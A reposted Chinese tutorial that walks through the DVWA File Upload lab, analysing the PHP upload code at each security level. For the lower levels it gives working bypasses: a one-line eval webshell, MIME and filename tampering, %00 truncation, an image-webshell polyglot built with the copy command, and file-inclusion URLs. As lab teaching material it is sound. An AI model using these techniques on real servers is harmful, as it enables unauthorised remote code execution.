File Upload,即文件上传。文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。

先看常规的文件上传操作:

客户端上传:

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>文件上传操作</title>

</head>

<body>

<form action="upload.php" method="post" enctype="multipart/form-data">

    用户名:<input type="text" name="username"><br />

    头像:<input type="file" name="img"><br />

    <input type="submit" value="提交">

</form>

</body>

</html>

在HTML <form>标签中enctype属性规定在发送到服务器之前应该如何对表单数据进行编码。

它的值有三种:

application/x-www-form-urlencoded: 在发送前编码所有字符(默认)

multipart/form-data: 不对字符编码。在使用包含文件上传控件的表单时,必须使用该值。

text/plain: 空格转换为 "+" 加号,但不对特殊字符编码。

服务端接收:

使用$_FILES数组接收参数。

我们打印$_FILES

print_r($_FILES);

发现上传一个文件时的属性有:

[name] => feng.jpeg     文件的名称

[type] => image/jpeg     文件的MIME类型

[tmp_name] => C:\Users\Administrator\AppData\Local\Temp\php2007.tmp  文件的临时位置

[error] => 0       文件的错误信息  0 ok      1234 error

[size] => 2859    文件的大小

文件上传漏洞的利用的条件:

1.能够成功上传木马文件

2.上传文件必须能够被执行

3.上传文件的路径必须可知

下面对四种级别的代码进行分析。

Low Security Level:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

    // Where are we going to be writing to?

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?

    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

        // No

        echo '<pre>Your image was not uploaded.</pre>';

    }

    else {

        // Yes!

        echo "<pre>{$target_path} succesfully uploaded!</pre>";

    }

}

?>

basename()函数返回路径中的文件名部分。

string basename ( string $path [, string $suffix ] )

参数介绍:

$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。

$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个扩展名。

举例:

<?php

$path = "/testweb/home.php";

//显示带有文件扩展名的文件名

echo basename($path);

//显示不带有文件扩展名的文件名

echo basename($path,".php");

?>

输出:

home.php

home

Exploit
因为对于上面的利用条件全都满足,直接上传文件x.php(一句话木马)

<?php @eval($_POST['x']);?>

上传成功得到路径:

http://www.dvwa.com/hackable/uploads/x.php

菜刀成功连接

Medium Security Level

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

    // Where are we going to be writing to?

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?

    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&

        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?

        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {

            // No

            echo '<pre>Your image was not uploaded.</pre>';

        }

        else {

            // Yes!

            echo "<pre>{$target_path} succesfully uploaded!</pre>";

        }

    }

    else {

        // Invalid file

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';

    }

}

?>

从代码中可以看到,Medium Security Level的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。

Exploit

1).抓包修改文件类型

上传x.png文件,使用Burpsuite抓包:

可以看到文件类型为image/png,尝试修改filename为x.php,上传后成功得到x.php文件:

菜刀连接:

http://www.dvwa.com/hackable/uploads/x.php

2).%00截断上传绕过

在php版本小于5.3.4的服务器中,当magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为x.php%00.png。

这里我使用php 5.2.17版本进行测试:

可以看到,包中的文件类型为image/png,可以通过文件类型检查。点击上传后:

服务器会认为其文件名为x.php,顺势解析为php文件。

菜刀连接:

http://www.dvwa.com/hackable/uploads/x.php%00.png

3)文件上传+文件包含

因为采用的是一句话木马,所以文件大小符合要求,至于文件类型的检查,尝试修改文件名为x.png,上传成功:

但不能解析识别出是PHP文件,菜刀连接报错。

此时我们想到文件包含漏洞的利用。这里可以借助Medium Security Level的文件包含漏洞来获取webshell权限,利用方式如下:

本地文件包含:

http://www.dvwa.com/vulnerabilities/fi/?page=F:/phpStudy/PHPTutorial/WWW/hackable/uploads/x.png

远程文件包含:

http://www.dvwa.com/vulnerabilities/fi/?page=hthttp://tp://www.dvwa.com/hackable/uploads/x.png

成功获取webshell权限:

两种方式,菜刀均可以成功连接。

 High Security Level

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

    // Where are we going to be writing to?

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?

    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&

        ( $uploaded_size < 100000 ) &&

        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?

        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {

            // No

            echo '<pre>Your image was not uploaded.</pre>';

        }

        else {

            // Yes!

            echo "<pre>{$target_path} succesfully uploaded!</pre>";

        }

    }

    else {

        // Invalid file

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';

    }

}

?>

strrpos()函数:

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

函数详细介绍:PHP strrpos() 函数

strtolower()函数:

strtolower(string)

把字符串转换为小写。

getimagesize()函数:

getimagesize(string filename)

getimagesize()函数用于获取图像大小及相关信息,成功则返回一个数组,失败则返回FALSE并产生一条E_WARNING级的错误信息。

函数详细参考:PHP 获取图像信息 getimagesize 函数

可以看到,High Security Level的代码读取文件名中最后一个.后的字符串,通过文件名来限制文件类型因此要求上传文件名形式必须是*.jpg、*.jpeg 、*.png三者之一。getimagesize()函数更是限制了上传文件的文件头必须为图像类型。

Exploit

利用思路主要是:绕过getimagesize()函数检测识别和上传文件名的检测识别。

让getimagesize()函数检测无效的方法:文件头欺骗,继而使得getimagesize()函数无法判断。

下面科普下文件头相关的知识:

常见的图片格式的文件头标识如下:

JPEG/JPG - 文件头标识 (2 bytes): FF D8 (SOI) (JPEG 文件标识) - 文件结束标识 (2 bytes): FF D9 (EOI)

PNG - 文件头标识 (8 bytes) 89 50 4E 47 0D 0A 1A 0A

GIF - 文件头标识 (6 bytes) 47 49 46 38 39(37) 61 |GIF89(7)a

更多格式的文件头标识参见文章:通过文件头标识判断图片格式

文件头欺骗:伪造文件头,使文件头标识一样,其它部分我们修改为一句话木马,也就成了我们常说的图片一句话。

下面是两种常见的图片一句话制作方法:

方法 1:

copy y.png/b+x.php/a z.png

copy 命令中的两个文件的位置不能颠倒,否则生成的文件格式无效。

方法 2:

先用C32Asm十六进制模式打开y.png,然后将x.php拖入,然后另存为z.png

之后,我们将制作好的图片一句话,用getimagesize()函数识别测试,并与原图片文件对比,打印输出:

<?php

header("Content-type: text/html; charset=utf-8"); 

echo "y.png:";

$array0 = getimagesize("images/y.png");

print_r($array0);

echo "<br />";

echo "copy 命令制作的图片一句话 z1.png:";

$array1 = getimagesize("images/z1.png");

print_r($array1);

echo "C32Asm 制作的图片一句话 z2.png:";

$array2 = getimagesize("images/z2.png");

print_r($array2);

?>

以上是打印输出的file.php文件。

我们发现得到的数组内容没有丝毫改变,

从而证明了两种方法可以绕过getimagesize()函数的检测识别。接着我们再来进行利用:

1).%00截断上传绕过

采用%00截断的方法可以轻松绕过文件名的检查,采用刚才的图片一句话进行上传。(适用于php小于 5.3.4 版本)

菜刀连接:

http://www.dvwa.com/hackable/uploads/z.php%00.png

2).文件上传 + 文件包含

通过上传图片一句话和借助High Security Level的文件包含漏洞来进行利用:

菜刀连接:

http://www.dvwa.com/vulnerabilities/fi/?page=file:///F:/phpStudy/PHPTutorial/WWW/hackable/uploads/z.png

Impossible Security Level

<?php

if( isset( $_POST[ 'Upload' ] ) ) {

    // Check Anti-CSRF token

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // File information

    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];

    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];

    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?

    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';

    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';

    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );

    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?

    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&

        ( $uploaded_size < 100000 ) &&

        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&

        getimagesize( $uploaded_tmp ) ) {

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)

        if( $uploaded_type == 'image/jpeg' ) {

            $img = imagecreatefromjpeg( $uploaded_tmp );

            imagejpeg( $img, $temp_file, 100);

        }

        else {

            $img = imagecreatefrompng( $uploaded_tmp );

            imagepng( $img, $temp_file, 9);

        }

        imagedestroy( $img );

        // Can we move the file to the web root from the temp folder?

        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {

            // Yes!

            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";

        }

        else {

            // No

            echo '<pre>Your image was not uploaded.</pre>';

        }

        // Delete any temp files

        if( file_exists( $temp_file ) )

            unlink( $temp_file );

    }

    else {

        // Invalid file

        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';

    }

}

// Generate Anti-CSRF token

generateSessionToken();

?>

相关函数:

in_get(varname)

函数返回相应选项的值

imagecreatefromjpeg(filename)

函数返回图片文件的图像标识,失败返回false

imagejpeg(image,filename,quality)

从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从 0(最差质量,文件更小)到 100(最佳质量,文件最大)。

imagedestroy( img )

函数销毁图像资源

可以看到,Impossible Security Level的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token 防护 CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。

转载自:AnCoLin's Blog|影风博客DVWA File Upload 通关教程

DVWA File Upload 通关教程的更多相关文章

  1. DVWA File Inclusion 通关教程

    File Inclusion 介绍File Inclusion,即文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数:include(),req ...

  2. DVWA Command Injection 通关教程

    Command Injection 介绍 命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者bash命令)的一种注入攻 ...

  3. DVWA XSS (Reflected) 通关教程

    XSS 介绍XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需 ...

  4. DVWA XSS (Stored) 通关教程

    Stored Cross Site Scripting 存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户 ...

  5. DVWA File Upload level high 通关

    由于level 是 high 1.代码审计 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writi ...

  6. DVWA SQL Injection 通关教程

    SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...

  7. DVWA XSS (DOM) 通关教程

    DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容.结构以及样式. DOM型XSS其实是一种特殊类型的反射型XSS,它是 ...

  8. 【DVWA】SQL Injection(SQL 注入)通关教程

    日期:2019-07-28 20:43:48 更新: 作者:Bay0net 介绍: 0x00.基本信息 关于 mysql 相关的注入,传送门. SQL 注入漏洞之 mysql - Bay0net - ...

  9. DVWA CSRF 通关教程

    CSRF 介绍 CSRF,全称Cross-site request forgery,即跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie.会话等),诱骗其点击恶意链接或者访问包含攻击代码 ...

随机推荐

  1. 【Oracle】rman基于时间点恢复

    rman基于时间点恢复 场景: 由于某研究的误操作,导致财务模块的数据丢失,如何使用rman基于时间点恢复数据. 思路 1.克隆数据库的虚拟机,直接对数据库的数据进行恢复 RMAN> shutd ...

  2. 面试前必须要知道的21道Redis面试题

    1.使用redis有哪些好处? 速度快,因为数据存在内存中,类似于HashMap,HashMap的优势就是查找和操作的时间复杂度都是O(1) 支持丰富数据类型,支持string,list,set,so ...

  3. Linux入门——注意事项

    Linux入门——注意事项 摘要:本文主要说明了在使用Linux操作系统时,需要注意的问题. 严格区分大小写 和Windows不同,Linux是严格区分大小写的,包括文件名和目录名.命令.命令选项.配 ...

  4. Java并发包——线程安全的Map相关类

    Java并发包——线程安全的Map相关类 摘要:本文主要学习了Java并发包下线程安全的Map相关的类. 部分内容来自以下博客: https://blog.csdn.net/bill_xiang_/a ...

  5. java 学习 进阶之 一 (线程基础)

    一.线程安全 线程安全的概念:当多个线程访问某一个类(对象或方法)时.这个类始终都能表现出正确的行为那么这个类(对象或方法)就是线程安全的. synchronized:可以在任何对象及方法上加锁,而加 ...

  6. 使用 vue-cli(脚手架)搭建项目

    一.使用 vue-cli(脚手架)搭建项目 1) Vue-cli 是 vue 官方提供的用于搭建基于 vue+webpack+es6 项目的脚手架工具 2) 在线文档:https://github.c ...

  7. [转]awsome c++

    原文链接 Awesome C++ A curated list of awesome C++ (or C) frameworks, libraries, resources, and shiny th ...

  8. 简单记录(css换行带点与不带点)

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  9. CSS颜色、单位、文本样式

    一.CSS颜色:关键字 red16进制的6位 #ffffff16进制的3位 #fffrgb(0,255,100) 取值范围:0~255 (r:red.g:green.b:blue)rgba(0,255 ...

  10. 解决使用elementUI框架el-upload跨域上传时session丢失问题

    解决方法一: 1.使用elementUI框架el-upload跨域上传时,后端获取不到cookie,后端接口显示未登录,在添加了 with-credentials="true"后依 ...